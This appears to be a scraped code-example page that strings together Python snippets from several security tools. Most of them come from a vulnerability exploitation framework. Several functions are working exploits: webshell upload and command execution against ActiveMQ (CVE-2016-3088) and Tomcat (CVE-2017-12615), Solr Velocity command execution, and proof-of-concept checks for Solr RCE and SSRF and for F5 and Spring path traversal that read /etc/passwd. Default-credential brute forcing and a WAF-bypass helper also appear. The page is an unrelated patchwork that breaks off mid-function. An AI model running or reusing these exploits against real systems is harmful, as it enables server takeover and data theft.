Esempio n. 1
0
def netcat(domain, ns, count):
    A = DNSLookup(domain, ns)
    ip = socket.gethostbyname(str(ns)) if count is 0 else str(A)
    if not A:
        print(que + 'Using DIG to get the real IP')
        print('   ' + bad + 'IP not found using DNS Lookup')
    url = 'http://' + domain
    try:
        page = requests.get(url, timeout=config['http_timeout_seconds'])
        http = 'http://' if 'http://' in page.url else 'https://'
        hncat = page.url.replace(http, '').split('/')[0]
        home = page.url.replace(http, '').split(hncat)[1]
        print(que + 'Connecting %s using as Host Header: %s' % (ip, domain))
        data = requests.get('http://' + ip + home,
                            headers={'host': hncat},
                            timeout=config['http_timeout_seconds'],
                            allow_redirects=False)
        count = +1
        if data.status_code in [301, 302]:
            print("   " + info +
                  "Connection redirect to: %s" % data.headers['Location'])
            question = input("   " + info + 'Do yo want to redirect? y/n: '
                             ) if sys.version_info[0] == 3 else raw_input(
                                 "   " + info +
                                 'Do yo want to redirect? y/n: ')
        try:
            data = requests.get('http://' + ip + home,
                                headers={'host': hncat},
                                timeout=config['http_timeout_seconds'],
                                allow_redirects=True)
        except requests.exceptions.ConnectionError:
            if question in ['y', 'yes', 'ye']:
                print("   " + bad + 'Error while connecting to: %s' %
                      data.headers['Location'])
        if data.status_code == 200:
            count = +1
            sim = similarity(data.text, page.text)
            if sim > config['response_similarity_threshold']:
                print("   " + good + 'The connect has %d%% similarity to: %s' %
                      (round(100 * sim, 2), url))
                print("   " + good + '%s is the real IP' % ip)
                try:
                    quest(question='\n' + info +
                          'IP found. Do yo want to stop tests? y/n: ',
                          doY='sys.exit()',
                          doN="pass")
                except KeyboardInterrupt:
                    sys.exit()
            else:
                print("   " + bad + 'The connect has %d%% similarity to: %s' %
                      (round(100 * sim, 2), url))
                print("   " + bad + "%s is not the IP" % ip)
    except requests.exceptions.SSLError:
        print("   " + bad + 'Error handshaking with SSL')
    except requests.exceptions.ReadTimeout:
        print("   " + bad + "Connection Timeout to: %s" % ip)
    except requests.ConnectTimeout:
        print("   " + bad + "Connection Timeout to: %s" % ip)
    except requests.exceptions.ConnectionError:
        print("   " + bad + "Connection Timeout to: %s" % ip)
Esempio n. 2
0
def scan(domain, host, userAgent, randomAgent, header):
    headers = dict(x.replace(' ', '').split(':')
                   for x in header.split(',')) if header != None else {}
    headers.update({
        'User-agent':
        random.choice(
            open("data/txt/random_agents.txt").readlines()).rstrip("\n")
    }) if randomAgent == True else ''
    headers.update({'User-agent': userAgent}) if userAgent != None else ''
    try:
        print("\n" + Y + "Attempting to track real IP using: %s\n" % host)
        print(que + "Checking if {0} is similar to {1}".format(host, domain))
        get_domain = requests.get('http://' + domain,
                                  headers=headers,
                                  timeout=config['http_timeout_seconds'])
        get_host = requests.get('http://' + host,
                                headers=headers,
                                timeout=config['http_timeout_seconds'])
        page_similarity = similarity(get_domain.text, get_host.text)
        if page_similarity > config['response_similarity_threshold']:
            print(tab + good +
                  'HTML content is %d%% structurally similar to: %s' %
                  (round(100 * page_similarity, 2), domain))
        else:
            print(
                tab + bad +
                'Sorry, but HTML content is %d%% structurally similar to: %s' %
                (round(100 * page_similarity, 2), domain))
    except Exception:
        print(tab + bad + 'Connection cannot be established with: %s' % (host))
Esempio n. 3
0
 def cve_2016_3088_exp(self, cmd):
     self.threadLock.acquire()
     vul_name = "Apache AcitveMQ: CVE-2016-3088"
     self.path = "null"
     self.name = random_md5()
     self.webshell = "/" + self.name + ".jsp"
     self.exp = self.jsp_webshell
     self.passlist = [
         "admin:123456", "admin:admin", "admin:123123", "admin:activemq",
         "admin:12345678"
     ]
     try:
         for self.pa in self.passlist:
             self.base64_p = base64.b64encode(str.encode(self.pa))
             self.p = self.base64_p.decode('utf-8')
             self.headers_base64 = {
                 'User-Agent': self.ua,
                 'Authorization': 'Basic ' + self.p
             }
             url = urljoin(self.url, "/admin/test/systemProperties.jsp")
             self.request = requests.get(url,
                                         headers=self.headers_base64,
                                         timeout=self.timeout,
                                         verify=False)
             if self.request.status_code == 200:
                 self.path = \
                     re.findall('<td class="label">activemq.home</td>.*?<td>(.*?)</td>', self.request.text, re.S)[0]
                 break
         self.request = requests.put(self.url + "/fileserver/v.txt",
                                     headers=self.headers_base64,
                                     data=self.exp,
                                     timeout=self.timeout,
                                     verify=False)
         self.headers_move = {
             'User-Agent':
             self.ua,
             'Destination':
             'file://' + self.path + '/webapps/api' + self.webshell
         }
         self.request = requests.request("MOVE",
                                         self.url + "/fileserver/v.txt",
                                         headers=self.headers_move,
                                         timeout=self.timeout,
                                         verify=False)
         self.raw_data = dump.dump_all(self.request).decode(
             'utf-8', 'ignore')
         self.request = requests.get(self.url + "/api" + self.webshell +
                                     "?pwd=password&cmd=" + cmd,
                                     headers=self.headers_base64,
                                     timeout=self.timeout,
                                     verify=False)
         self.r = "[webshell: " + self.url + "/api" + self.webshell + "?pwd=password&cmd=" + cmd + " ]\n"
         self.r += self.request.text
         verify.exploit_print(self.r, self.raw_data)
     except requests.exceptions.Timeout:
         verify.timeout_print(vul_name)
     except requests.exceptions.ConnectionError:
         verify.connection_print(vul_name)
     except Exception:
         verify.error_print(vul_name)
Esempio n. 4
0
 def cve_2019_0193_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Apache Solr: CVE-2019-0193"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = self.payload_cve_2019_0193.replace("RECOMMAND", "whoami")
     self.vul_info["vul_name"] = "Apache Solr 搜索引擎中的命令执行漏洞"
     self.vul_info["vul_numb"] = "CVE-2019-0193"
     self.vul_info["vul_apps"] = "Solr"
     self.vul_info["vul_date"] = "2019-10-16"
     self.vul_info["vul_vers"] = "< 8.2.0"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "Remote Code Execution"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "在Apache solr的可选模块DatalmportHandler中的DIH配置是可以包含脚本,因此存在安全隐患," \
                                 "在apache solr < 8.2.0版本之前DIH配置中dataconfig可以被用户控制"
     self.vul_info["cre_auth"] = "zhzyker"
     core_name = "null"
     md = random_md5()
     cmd = "echo " + md
     payload = self.payload_cve_2019_0193.replace("RECOMMAND", quote(cmd, 'utf-8'))
     solrhost = self.hostname + ":" + str(self.port)
     headers = {
         'Host': "" + solrhost,
         'User-Agent': self.ua,
         'Accept': "application/json, text/plain, */*",
         'Accept-Language': "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
         'Accept-Encoding': "zip, deflate",
         'Referer': self.url + "/solr/",
         'Content-type': "application/x-www-form-urlencoded",
         'X-Requested-With': "XMLHttpRequest",
         'Connection': "close"
     }
     urlcore = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
     try:
         request = requests.get(urlcore, headers=headers, timeout=self.timeout, verify=False)
         try:
             core_name = list(json.loads(request.text)["status"])[0]
         except:
             pass
         urlconfig = self.url + "/solr/" + str(core_name) + "/admin/mbeans?cat=QUERY&wt=json"
         request = requests.get(urlconfig, headers=headers, timeout=self.timeout, verify=False)
         url_cmd = self.url + "/solr/" + str(core_name) + "/dataimport"
         request = requests.post(url_cmd, data=payload, headers=headers, timeout=self.timeout, verify=False)
         if request.status_code == 200 and core_name != "null":
             self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoC_MaYbE"
             self.vul_info["prt_info"] = "[maybe] [core name:" + url_cmd + "] "
             verify.scan_print(self.vul_info)
         else:
             verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
Esempio n. 5
0
def IPscan(domain, ns, A):
    url = 'http://' + domain
    if A != None:
        try:
            print(que + 'Using DIG to get the real IP')
            print("   " + good + 'Possible IP: %s' % str(A))
            print(que + 'Retrieving target homepage at: %s' % url)
            try:
                org_response = requests.get(
                    url, timeout=config['http_timeout_seconds'])
            except requests.exceptions.Timeout:
                sys.stderr.write("   " + bad +
                                 "%s timed out after %d seconds\n" %
                                 (url, config['http_timeout_seconds']))
            except requests.exceptions.RequestException:
                sys.stderr.write("   " + bad + "Failed to retrieve %s\n" % url)
            if org_response.status_code != 200:
                print('   ' + bad +
                      'Responded with an unexpected HTTP status code')
            if org_response.url != url:
                print('   ' + good + '%s redirects to %s' %
                      (url, org_response.url))
                print("   " + good +
                      "Request redirected successful to %s" % org_response.url)
            try:
                sec_response = requests.get(
                    'http://' + str(A), timeout=config['http_timeout_seconds'])
                if sec_response.status_code != 200:
                    print('   ' + bad +
                          'Responded with an unexpected HTTP status code')
                else:
                    page_similarity = similarity(sec_response.text,
                                                 org_response.text)
                    if page_similarity > config[
                            'response_similarity_threshold']:
                        print(
                            que +
                            'Testing if source body is the same in both websites'
                        )
                        print(
                            '   ' + good +
                            ' HTML content is %d%% structurally similar to: %s'
                            % (round(100 * page_similarity, 2),
                               org_response.url))
            except Exception:
                print("   " + bad + "Connection Timeout")
            netcat(domain, ns, count=+1)
            return org_response
        except requests.exceptions.SSLError:
            print("   " + bad + 'Error handshaking with SSL')
        except requests.exceptions.ReadTimeout:
            print("   " + bad + "Connection Timeout")
        except requests.ConnectTimeout:
            print("   " + bad + "Connection Timeout")
Esempio n. 6
0
 def _safeRequest(self, safeURL):
     '''
     安全请求,用于绕过WAF等安全设备
     '''
     if not safeURL:
         return
     #url = random.choice(safeURL.split())
     try:
         http.get(safeURL)
     except http.ConnectionError:
         pass
Esempio n. 7
0
 def _safeRequest(self, safeURL):
     '''
     安全请求,用于绕过WAF等安全设备
     '''
     if not safeURL:
         return
     #url = random.choice(safeURL.split())
     try:
         http.get(safeURL)
     except http.ConnectionError:
         pass
Esempio n. 8
0
 def cve_2021_27905_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Apache Solr: CVE-2021-27905"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_name"] = "Apache Solr Replication handler SSRF"
     self.vul_info["vul_numb"] = "CVE-2021-27905"
     self.vul_info["vul_apps"] = "Solr"
     self.vul_info["vul_date"] = "2021-04-14"
     self.vul_info["vul_vers"] = "7.0.0-7.7.3, 8.0.0-8.8.1"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "SSRF"
     self.vul_info["vul_data"] = "null"
     self.vul_info[
         "vul_desc"] = "Apache Solr是一个开源搜索服务引擎,Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。漏洞产生在 ReplicationHandler 中的 masterUrl 参数( leaderUrl 参数)可指派另一个 Solr 核心上的 ReplicationHandler 讲索引数据复制到本地核心上。成功利用此漏洞可造成服务端请求伪造漏洞。"
     self.vul_info["cre_auth"] = "zhzyker"
     core_name = None
     dns = dns_request()
     url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
     try:
         request = requests.get(url_core,
                                headers=self.headers,
                                timeout=self.timeout,
                                verify=False)
         try:
             core_name = list(json.loads(request.text)["status"])[0]
         except:
             pass
         payload = "/solr/re_core_name/replication?command=fetchindex&masterUrl" \
                   "=http://re_dns_domain/&wt=json&httpBasicAuthUser="******"&httpBasicAuthPassword="******"re_core_name", core_name).replace("re_dns_domain", dns)
         url_ssrf = urljoin(self.url, payload)
         r = requests.get(url_ssrf,
                          headers=self.headers,
                          timeout=self.timeout,
                          verify=False)
         if dns in dns_result(dns):
             self.vul_info["vul_payd"] = url_ssrf
             self.vul_info["vul_data"] = dump.dump_all(r).decode(
                 'utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info[
                 "prt_info"] = "[ssrf] [dns] [corename: " + self.url + "/solr/" + core_name + " ]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as e:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
Esempio n. 9
0
 def cve_2019_17558_exp(self, cmd):
     vul_name = "Apache Solr: CVE-2019-17558"
     core_name = None
     payload_2 = self.payload_cve_2019_17558.replace("RECOMMAND", cmd)
     url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
     try:
         request = requests.get(url_core,
                                headers=self.headers,
                                timeout=self.timeout,
                                verify=False)
         try:
             core_name = list(json.loads(request.text)["status"])[0]
         except AttributeError:
             pass
         url_api = self.url + "/solr/" + str(core_name) + "/config"
         headers_json = {
             'Content-Type': 'application/json',
             'User-Agent': self.ua
         }
         set_api_data = """
         {
           "update-queryresponsewriter": {
             "startup": "lazy",
             "name": "velocity",
             "class": "solr.VelocityResponseWriter",
             "template.base.dir": "",
             "solr.resource.loader.enabled": "true",
             "params.resource.loader.enabled": "true"
           }
         }
         """
         request = requests.post(url_api,
                                 data=set_api_data,
                                 headers=headers_json,
                                 timeout=self.timeout,
                                 verify=False)
         request = requests.get(self.url + "/solr/" + str(core_name) +
                                payload_2,
                                headers=self.headers,
                                timeout=self.timeout,
                                verify=False)
         raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
         verify.exploit_print(request.text, raw_data)
     except requests.exceptions.Timeout:
         verify.timeout_print(vul_name)
     except requests.exceptions.ConnectionError:
         verify.connection_print(vul_name)
     except Exception:
         verify.error_print(vul_name)
Esempio n. 10
0
 def cve_2020_5902_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "F5 BIG-IP: CVE-2020-5902"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_name"] = "F5 BIG-IP Remote Code Execution"
     self.vul_info["vul_numb"] = "CVE-2020-5902"
     self.vul_info["vul_apps"] = "Flink"
     self.vul_info["vul_date"] = "2020-07-15"
     self.vul_info["vul_vers"] = "< 11.6.x"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "Remote Code Execution"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "The Traffic Management User Interface (TMUI), also referred to as the " \
                                 "Configuration utility, has a Remote Code Execution (RCE) vulnerability in " \
                                 "undisclosed pages. (CVE-2020-5902)"
     self.vul_info["cre_date"] = "2021-03-20"
     self.vul_info["cre_auth"] = "zhzyker"
     url = urljoin(
         self.url,
         "/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=CVE-2020-5902")
     try:
         request = requests.get(url,
                                headers=self.headers,
                                timeout=self.timeout,
                                verify=False)
         if request.status_code == 200 and r"CVE-2020-5902" in request.text:
             url = self.url + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"
             request = requests.get(url,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
             if r"root:x:0:0:" in request.text and r"daemon:x:" in request.text and r"nologin" in request.text:
                 self.vul_info["vul_data"] = dump.dump_all(request).decode(
                     'utf-8', 'ignore')
                 self.vul_info["vul_payd"] = url
                 self.vul_info["prt_resu"] = "PoCSuCCeSS"
                 self.vul_info["prt_info"] = "[rce] [url:" + url + " ]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
Esempio n. 11
0
 def request(self, path):
     i = 0
     proxy = None
     result = None
     while i <= self.maxRetries:
         try:
             if self.proxy is not None:
                 proxy = {"https" : self.proxy, "http" : self.proxy}
             url = "{0}://{1}:{2}".format(self.protocol, self.host, self.port)
             url = urllib.parse.urljoin(url, self.basePath)
             url = urllib.parse.urljoin(url, path)
             headers = dict(self.headers)
             if self.randomAgents is not None:
                 headers["User-agent"] = random.choice(self.randomAgents)
             response = requests.get(url, proxies=proxy, verify=False, allow_redirects=self.redirect, headers=headers, timeout=self.timeout)
             result = Response(response.status_code, response.reason, response.headers, response.content)
             del headers
             break
         except requests.exceptions.ConnectionError as e:
             if self.proxy is not None:
                 raise RequestException({'message': 'Error with the proxy: {0}'.format(e)})
             continue
         except requests.exceptions.ReadTimeout:
             continue
         except requests.exceptions.Timeout:
             continue
         finally:
             i = i + 1
     if i > self.maxRetries:
         raise RequestException({'message': 'CONNECTION TIMEOUT: There was a problem in the request to: {0}'.format(path)})
     return result
Esempio n. 12
0
    def crawlerThread():
        global countVisitedUrls

        while visitQueue.qsize() > 0:
            url = visitQueue.get()
            try:
                hashData = hashUrl(url)
                if hashData not in visited:
                    headers[HTTP_HEADER.USER_AGENT] = randomUserAgents()
                    response = requests.get(url, timeout=10, headers=headers)
                    crawlMsg = 'crawled %s depth: %d count: %d' % (url, currentDepth, countVisitedUrls)
                    logger.log(CUSTOM_LOGGING.SYSINFO, crawlMsg)
                    content = response.text

                    kb.pageEncoding = response.encoding
                    conf.cookie = str(response.cookies.get_dict())

                    try:
                        lock.acquire()
                        visited.add(hashData)
                        countVisitedUrls += 1
                        fp.write(url + '\n')
                        lock.release()
                    except Exception, ex:
                        logger.log(CUSTOM_LOGGING.ERROR, ex)
                        if lock.locked():
                            lock.release()
                        continue
                else:
                    continue
Esempio n. 13
0
 def start(url, webapps_identify):
     ua = globals.get_value("UA")  # 获取全局变量UA
     timeout = globals.get_value("TIMEOUT")  # 获取全局变量UA
     headers = {'User-Agent': ua}
     try:
         resp = requests.get(url, headers=headers, timeout=timeout, verify=False)
     except:
         resp = "null"
     start = Identify(url)
     start.flink(webapps_identify, resp, url)
     start.tomcat(webapps_identify, resp, url)
     start.fastjson(webapps_identify, url)
     start.elasticsearch(webapps_identify, resp, url)
     start.jenkins(webapps_identify, resp, url)
     start.weblogic(webapps_identify, resp, url)
     start.spring(webapps_identify, resp, url)
     start.solr(webapps_identify, resp, url)
     start.nexus(webapps_identify, resp, url)
     start.jboss(webapps_identify, resp, url)
     start.drupal(webapps_identify, resp, url)
     start.struts2(webapps_identify, resp, url)
     start.shiro(webapps_identify, resp, url)
     start.druid(webapps_identify, resp, url)
     start.eyou(webapps_identify, resp, url)
     start.coremail(webapps_identify, resp, url)
     if webapps_identify:
         for a in webapps_identify:
             print("\r{0}{1}".format(now.timed(de=0) + color.yel_info(), color.yellow(" The identification target is: " + a + "          ")))
     else:
         webapps_identify.append("all")
         print("\r{0}{1}".format(now.timed(de=0) + color.yel_info(), color.yellow(" Unable to identify target, Run all pocs           ")))
Esempio n. 14
0
 def spring(self, webapps_identify, resp, url):
     name = "Spring"
     time.sleep(0.1)
     Identify.identify_prt(name)
     try:
         if r"timestamp" in resp.text and r"status" in resp.text and r"path" in resp.text and r"message" in resp.text:
             webapps_identify.append("spring")
         elif 'WWW-Authenticate' in resp.headers:
             if r"Spring" in resp.headers['WWW-Authenticate'] and r"Basic" in resp.headers['WWW-Authenticate']:
                 webapps_identify.append("spring")
         elif 'Www-Authenticate' in resp.headers:
             if r"Spring" in resp.headers['Www-Authenticate'] and r"Basic" in resp.headers['Www-Authenticate']:
                 webapps_identify.append("spring")
         elif r"X-Application-Context" in resp.headers:
             webapps_identify.append("spring")
         else:
             r = requests.get(self.url + "/233/233/233", headers=self.headers, timeout=self.timeout, verify=False)
             if r"timestamp" in r.text and r"status" in r.text and r"path" in r.text and r"message" in r.text:
                 webapps_identify.append("spring")
             elif 'WWW-Authenticate' in resp.headers:
                 if r"Spring" in r.headers['WWW-Authenticate'] and r"Basic" in r.headers['WWW-Authenticate']:
                     webapps_identify.append("spring")
             elif 'Www-Authenticate' in resp.headers:
                 if r"Spring" in r.headers['Www-Authenticate'] and r"Basic" in r.headers['Www-Authenticate']:
                     webapps_identify.append("spring")
             elif r"X-Application-Context" in r.headers:
                 webapps_identify.append("spring")
     except:
         pass
Esempio n. 15
0
    def request(self, path):
        i = 0
        proxy = None
        result = None
        while i <= self.maxRetries:
            try:
                if self.proxy is not None:
                    proxy = {"https": self.proxy, "http": self.proxy}
                if self.requestByHostname:
                    url = "{0}://{1}:{2}".format(self.protocol, self.host,
                                                 self.port)
                else:
                    url = "{0}://{1}:{2}".format(self.protocol, self.ip,
                                                 self.port)
                url = urllib.parse.urljoin(url, self.basePath)

                # Joining with concatenation because a urljoin bug with "::"
                if not url.endswith('/'):
                    url += "/"
                if path.startswith('/'):
                    path = path[1:]
                url += path

                headers = dict(self.headers)
                if self.randomAgents is not None:
                    headers["User-agent"] = random.choice(self.randomAgents)
                headers["Host"] = self.host
                # include port in Host header if it's non-standard
                if (self.protocol == "https"
                        and self.port != 443) or (self.protocol == "http"
                                                  and self.port != 80):
                    headers["Host"] += ":{0}".format(self.port)

                response = requests.get(url, proxies=proxy, verify=False, allow_redirects=self.redirect, \
                                        headers=headers, timeout=self.timeout)
                result = Response(response.status_code, response.reason,
                                  response.headers, response.content)
                del headers
                break
            except requests.exceptions.TooManyRedirects as e:
                raise RequestException(
                    {'message': 'Too many redirects: {0}'.format(e)})
            except ConnectionResetError as e:
                raise RequestException(
                    {'message': 'ConnectionResetError: {0}'.format(e)})
            except requests.exceptions.ConnectionError as e:
                if self.proxy is not None:
                    raise RequestException(
                        {'message': 'Error with the proxy: {0}'.format(e)})
                continue
            except (requests.exceptions.ReadTimeout, requests.exceptions.Timeout, http.client.IncompleteRead, \
                    socket.timeout):
                continue
            finally:
                i = i + 1
        if i > self.maxRetries:
            raise RequestException(\
                {'message': 'CONNECTION TIMEOUT: There was a problem in the request to: {0}'.format(path)}
                )
        return result
Esempio n. 16
0
 def cve_2017_12615_exp(self, cmd):
     vul_name = "Apache Tomcat: CVE-2017-12615"
     self.name = random_md5()
     self.webshell = "/" + self.name + ".jsp/"
     self.payload1 = self.name
     self.payload2 = self.payload_cve_2017_12615
     try:
         self.req = requests.put(self.url + self.webshell,
                                 data=self.payload2,
                                 headers=self.headers,
                                 timeout=self.timeout,
                                 verify=False)
         self.urlcmd = self.url + "/" + self.name + ".jsp?pwd=password&cmd=" + cmd
         self.request = requests.get(self.urlcmd,
                                     headers=self.headers,
                                     timeout=self.timeout,
                                     verify=False)
         self.r = "Put Webshell: " + self.urlcmd + "\n-------------------------\n" + self.request.text
         raw_data = dump.dump_all(self.req).decode('utf-8', 'ignore')
         verify.exploit_print(self.r, raw_data)
     except requests.exceptions.Timeout:
         verify.timeout_print(vul_name)
     except requests.exceptions.ConnectionError:
         verify.connection_print(vul_name)
     except Exception as e:
         verify.error_print(vul_name)
Esempio n. 17
0
    def get_page_source_info(self, url, headers, cookies, times=0):
        if times < 3:
            try:
                # test proxy
                # proxy_switch.link_proxy(self.proxy)
                req = requests.get(url, headers=headers, cookies=cookies, timeout=self.timeout)
                if req.status_code == 200:
                    # 获取网页编码
                    encoding = None
                    try:
                        encoding = req.apparent_encoding
                        if encoding is not None:
                            encoding = encoding.lower()
                            encoding = encoding if 'utf' in encoding or 'gbk' in encoding else None
                    except Exception, e:
                        log.output_log("".join(["[error] ", str(e)]), True)

                    encoding = self.get_page_charset(req.content) if encoding is None else encoding
                    req.encoding = "utf-8" if encoding is None else encoding
                    html = req.text
                    req.close()
                    return [html, encoding]
                
                if req.status_code == 403:
                    times += 1
                    log.output_log("[error] 403 and try to connet %d" % times, True)
                    proxy_switch.link_proxy(self.proxy)
                    self.get_page_source_info(url, headers, cookies, times)
                return None
            
            except Exception, e:
                log.output_log("".join(["[error] ", str(e)]), True)
                return None
Esempio n. 18
0
def proxy_set(pr, pr_mode):
    headers = globals.get_value("HEADERS")  # 获取全局变量HEADERS
    try:
        proxy_ip = str(re.search(r"(.*):", pr).group(1))
        proxy_port = int(re.search(r":(.*)", pr).group(1))
    except AttributeError:
        print(
            now.timed(de=0) + color.red_warn() + color.red(
                " Proxy format error (e.g. --proxy-socks 127.0.0.1:1080)"))
        sys.exit(0)
    if r"socks" in pr_mode:
        socks.set_default_proxy(socks.SOCKS5, proxy_ip, proxy_port)
    elif r"http" in pr_mode:
        socks.set_default_proxy(socks.HTTP, addr=proxy_ip, port=proxy_port)
    socket.socket = socks.socksocket
    try:
        proxy_ip_info = requests.get("http://api.hostip.info/get_json.php",
                                     headers=headers,
                                     timeout=5)
        proxy_ip_info_json = json.loads(proxy_ip_info.text)
        proxy_ip_info_dict = "[region: " + proxy_ip_info_json[
            "country_name"] + "] " + "[city: " + proxy_ip_info_json[
                "city"] + "] " + "[proxy ip: " + proxy_ip_info_json["ip"] + "]"
    except requests.exceptions.ConnectionError:
        proxy_ip_info_dict = "[region: ???] [city: ???] [proxy ip: ???]"
    except requests.exceptions.Timeout:
        proxy_ip_info_dict = "[region: ???] [city: ???] [proxy ip: ???]"
    print(
        now.timed(de=0) + color.yel_info() +
        color.yellow(" Use custom proxy: " + pr))
    print(
        now.timed(de=0) + color.yel_info() +
        color.yellow(" Proxy info: " + proxy_ip_info_dict))
Esempio n. 19
0
 def cve_2020_5410_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Spring Cloud: CVE-2020-5410"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "/..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/a"
     self.vul_info["vul_name"] = "Spring Cloud Config目录穿越漏洞"
     self.vul_info["vul_numb"] = "CVE-2020-5410"
     self.vul_info["vul_apps"] = "Spring"
     self.vul_info["vul_date"] = "2020-06-02"
     self.vul_info["vul_vers"] = "< 2.2.3, < 2.1.9"
     self.vul_info["vul_risk"] = "medium"
     self.vul_info["vul_type"] = "目录穿越漏洞"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x" \
                                 "版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。" \
                                 "恶意用户或攻击者可以使用特制URL发送请求,这可能导致目录遍历攻击。"
     self.vul_info["cre_date"] = "2021-01-26"
     self.vul_info["cre_auth"] = "zhzyker"
     try:
         request = requests.get(self.url+self.vul_info["vul_payd"], headers=self.headers, timeout=self.timeout, verify=False)
         if request.status_code == 200:
             if r"x:0:0:root:/root:" in request.text and r"/sbin/nologin" in request.text and r"daemon" in request.text:
                 self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
                 self.vul_info["prt_resu"] = "PoCSuCCeSS"
                 self.vul_info["prt_info"] = "[url: " + self.url + self.vul_info["vul_payd"] + " ]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as e:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
Esempio n. 20
0
    def get_page_source_info(self, url, headers, cookies, times=0):
        if times < 3:
            try:
                # test proxy
                proxy_switch.link_proxy(self.proxy)
                req = requests.get(url, headers=headers, cookies=cookies, timeout=self.timeout)
                if req.status_code == 200:
                    # 获取网页编码
                    encoding = None
                    try:
                        encoding = req.apparent_encoding
                        if encoding is not None:
                            encoding = encoding.lower()
                            encoding = encoding if 'utf' in encoding or 'gbk' in encoding else None
                    except Exception, e:
                        log.output_log("[error] " + str(e), True)

                    encoding = self.get_page_charset(req.content) if encoding is None else encoding
                    req.encoding = "utf-8" if encoding is None else encoding
                    html = req.text
                    req.close()
                    return [html, encoding]
                
                if req.status_code == 403:
                    times += 1
                    log.output_log("[error] 403 and try to connet %d" % times, True)
                    proxy_switch.link_proxy(self.proxy)
                    self.get_page_source_info(url, headers, cookies, times)
                return None
            
            except Exception, e:
                log.output_log("[error] " + str(e), True)
                return None
Esempio n. 21
0
 def cve_2019_3799_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Spring Cloud: CVE-2019-3799"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd"
     self.vul_info["vul_name"] = "Spring-Cloud-Config-Server Directory Traversal"
     self.vul_info["vul_numb"] = "CVE-2019-3799"
     self.vul_info["vul_apps"] = "Spring"
     self.vul_info["vul_date"] = "2019-04-22"
     self.vul_info["vul_vers"] = "2.1.0-2.1.1, 2.0.0-2.0.3, 1.4.0-1.4.5"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "Directory Traversal"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "由于spring-cloud-config-server模块未对传入路径进行安全限制," \
                                 "攻击者可以利用多个..%252f进行目录遍历,查看服务器其他路径的敏感文件,造成敏感信息泄露。"
     self.vul_info["cre_date"] = "2021-01-27"
     self.vul_info["cre_auth"] = "zhzyker"
     try:
         request = requests.get(self.url+self.vul_info["vul_payd"], headers=self.headers, timeout=self.timeout, verify=False)
         if r"x:0:0:root:/root:" in request.text and r"/sbin/nologin" in request.text and r"daemon" in request.text:
             self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info["prt_info"] = "[url: " + self.url + self.vul_info["vul_payd"] + " ]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
